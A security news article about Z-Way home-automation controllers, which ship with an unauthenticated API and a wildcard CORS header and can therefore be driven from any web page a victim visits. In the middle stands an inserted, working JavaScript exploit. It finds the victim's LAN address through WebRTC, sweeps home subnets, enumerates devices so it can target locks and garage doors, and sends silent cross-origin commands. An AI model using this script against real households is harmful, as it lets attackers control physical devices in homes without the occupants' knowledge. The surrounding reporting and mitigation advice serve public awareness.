A researcher is warning users of the Z-Way home-automation controller that a weakness in the software's default configuration leaves it exposed to attacks launched from any web page the user happens to visit.
Z-Way is the controller and abstraction layer of software that handles Z-Wave, a standard for wireless communication between devices in smart homes. The standard is present in 35 million devices worldwide, including automated lighting, small appliances, and thermostats.
Z-Way exposes the Z-Wave network through a web API; that API in turn feeds the controller's web interface and the Z-Way apps for Android and iOS, according to Randy Westergren, a researcher with XDA Developers who discovered the weakness and discussed it in a personal blog post over the weekend.
“I felt it was a serious security risk that was, and still is, mostly unknown to customers,” Westergren warned.
Westergren has dug up API vulnerabilities before: earlier this year he reported a privacy issue in TurboTax’s API and a bug in Verizon’s mobile API that compromised users’ email accounts.
Westergren, who’s in the process of automating his home, stumbled upon the lapse after purchasing a RaZberry board, a Z-Wave daughter card for the Raspberry Pi that ships with Z-Way. While reviewing the web requests the device’s Angular-based web interface makes to the controller’s API, the researcher noticed that the API didn’t require any authentication at all, leaving it to the user to keep their own network safe.
After looking into the issue further, Westergren learned from a RaZberry FAQ that Z-Way ships without authentication by default and that the vendor encourages users to protect their devices by other means, such as “nginx and other reverse proxy servers.”
“It was interesting to find that the vendor was aware of the issue, yet relinquished themselves of dealing with it,” Westergren wrote, “…while a user’s LAN is supposed to be somewhat safe, this doesn’t mean remote attacks are impossible.”
Having established that the API was unauthenticated, Westergren looked into ways of reaching it from outside the LAN and found that a cross-origin attack could easily compromise the device. The reason is that the default Cross-Origin Resource Sharing (CORS) header on Z-Way’s web server is a wildcard that allows any origin, which, according to the researcher, is what makes cross-origin attacks practical. An attacker could therefore embed malicious JavaScript in a page, have the victim’s browser sweep the hosts on the victim’s subnet, and trigger a Z-Wave operation on any Z-Way controller it finds.
“The victim would have no indication that [the requests] were being performed,” Westergren wrote.
To demonstrate the attack, Westergren put together a script that cycles through hosts on the local subnet, attempting to POST to the API on each. His proof of concept merely turns on a light switch, but the researcher points out that this is low-hanging fruit: the same script could just as easily be written to control door locks, garage-door openers and any other device that can be driven through Z-Way.
An attacker can broaden or narrow the sweep, according to Westergren. To cast a wider net, the script can try more of the subnets home routers use by default. To narrow its scope, if the victim is using a browser that supports WebRTC, the script can make STUN requests to determine the user’s LAN IP address and sweep only that subnet.
The wildcard CORS header isn’t the root cause, since it is the missing authentication that lets the requests succeed at all, but the header makes the attack easier to mount and harder for the victim to notice.
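The sweep described in the preceding paragraphs, written out as an added example in JavaScript. This is not Westergren’s script and not Z-Way code; it reconstructs the technique from the article. The port (8083), the command path (`/ZAutomation/api/v1/devices/<deviceId>/command/on`), the shape of the device-list response, the placeholder device id and the list of default subnets are all assumptions not stated in the article.

```javascript
// Added example reconstructing the sweep described above. It is not
// Westergren's script and not Z-Way code. Assumptions not stated in the
// article: the Z-Way web server listens on TCP 8083, a device is switched
// with POST /ZAutomation/api/v1/devices/<deviceId>/command/on, and the
// device list comes back as { data: { devices: [{ id: ... }, ...] } }.
const ZWAY_PORT = 8083;
// Common home /24s to try when the victim's LAN address is unknown (assumed).
const DEFAULT_PREFIXES = ['192.168.0', '192.168.1', '10.0.0'];

// Hosts .1 through .254 of a /24 given its first three octets.
function hostsInSubnet(prefix) {
  const hosts = [];
  for (let i = 1; i <= 254; i++) hosts.push(`${prefix}.${i}`);
  return hosts;
}

// Extract the LAN address from an ICE "host" candidate line. Browsers of the
// 2015 era exposed it verbatim; current ones substitute an mDNS name, in
// which case this returns null and the sweep falls back to DEFAULT_PREFIXES.
function lanIpFromCandidate(candidate) {
  const m = /(\d{1,3}(?:\.\d{1,3}){3}) \d+ typ host/.exec(candidate || '');
  return m ? m[1] : null;
}

// Browser-only: trigger ICE gathering against a public STUN server and
// resolve with the first LAN IP seen, or null after timeoutMs.
function discoverLanIp(timeoutMs = 2000) {
  return new Promise((resolve) => {
    if (typeof RTCPeerConnection === 'undefined') return resolve(null);
    const pc = new RTCPeerConnection({ iceServers: [{ urls: 'stun:stun.l.google.com:19302' }] });
    let timer = null;
    const done = (ip) => { clearTimeout(timer); pc.close(); resolve(ip); };
    timer = setTimeout(() => done(null), timeoutMs);
    pc.onicecandidate = (e) => {
      const ip = e.candidate ? lanIpFromCandidate(e.candidate.candidate) : null;
      if (ip) done(ip);
    };
    pc.createDataChannel('probe');
    pc.createOffer().then((offer) => pc.setLocalDescription(offer));
  });
}

// Narrow the sweep to the victim's own /24 when the LAN IP is known,
// otherwise cast the wider net over the default prefixes.
function buildTargets(lanIp) {
  if (lanIp) return hostsInSubnet(lanIp.split('.').slice(0, 3).join('.'));
  return DEFAULT_PREFIXES.flatMap(hostsInSubnet);
}

function commandUrl(host, deviceId, command) {
  return `http://${host}:${ZWAY_PORT}/ZAutomation/api/v1/devices/${deviceId}/command/${command}`;
}

// Only possible because of the wildcard CORS header: read a controller's
// device list so the script can pick locks or garage doors by id instead of
// guessing. With an explicit origin allowlist this read would be blocked.
async function listDevices(host, fetchImpl = globalThis.fetch) {
  const res = await fetchImpl(`http://${host}:${ZWAY_PORT}/ZAutomation/api/v1/devices`);
  const body = await res.json();
  return body && body.data && Array.isArray(body.data.devices)
    ? body.data.devices.map((d) => d.id)
    : [];
}

// Fire the cross-origin POSTs. mode: 'no-cors' means the page never reads the
// response, so even a strict CORS allowlist would not stop these requests from
// reaching the controller; only authentication does. The victim sees nothing.
// fetchImpl is injectable so the sweep can be exercised without a network.
async function sweep(hosts, deviceId, fetchImpl = globalThis.fetch) {
  const attempted = [];
  await Promise.allSettled(hosts.map((host) => {
    const url = commandUrl(host, deviceId, 'on');
    attempted.push(url);
    return fetchImpl(url, { method: 'POST', mode: 'no-cors' });
  }));
  return attempted;
}

// In a page (placeholder device id):
// discoverLanIp().then((ip) => sweep(buildTargets(ip), 'ZWayVDev_zway_2-0-37'));
```

The two halves illustrate the article’s distinction: `listDevices` depends on the wildcard CORS header, because the page has to read the response, whereas `sweep` works against any CORS policy as long as the API accepts unauthenticated requests.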
“The combination of a lack of authentication and a wildcard origin policy makes an attack easy and transparent to the user,” Westergren told Threatpost Monday.
Westergren doesn’t disagree with Z-Way’s stance that LAN security is the customer’s responsibility, but he still wants to warn users that serious risks remain no matter how well the private LAN is segmented.
“I felt it was important to raise awareness of the customer’s risk in running the software using the default configuration,” Westergren said, adding that he feels Z-Way is underestimating the threat by not securing their devices out of the box.
Users can mitigate the threat to an extent by configuring authentication for RaZberry, but the process can be “a little involved,” according to Westergren. Still, it may be the best option for security-conscious users wishing to deploy Z-Way in home environments.
Those looking to tighten the way the API handles cross-origin requests can also specify the allowed origin explicitly in the CORS policy, according to Westergren, but that won’t eliminate the threat entirely: CORS only governs whether a page may read the response, not whether the browser sends the request, so an unauthenticated API can still be made to act on a blind request it never answers.
“This weakness in the Z-Way package is fairly targeted,” Westergren said. “It demonstrates the risk of liberal CORS implementations and how they can be exploited by attackers.”
While Z-Wave technology is still relatively young, other household smart devices, connected over Bluetooth and Wi-Fi, have been used as a critical attack vector of late. Last year Kaspersky Lab researcher David Jacoby found 22 exploitable vulnerabilities in devices connected to his own home network, including gaming consoles, televisions and network storage devices.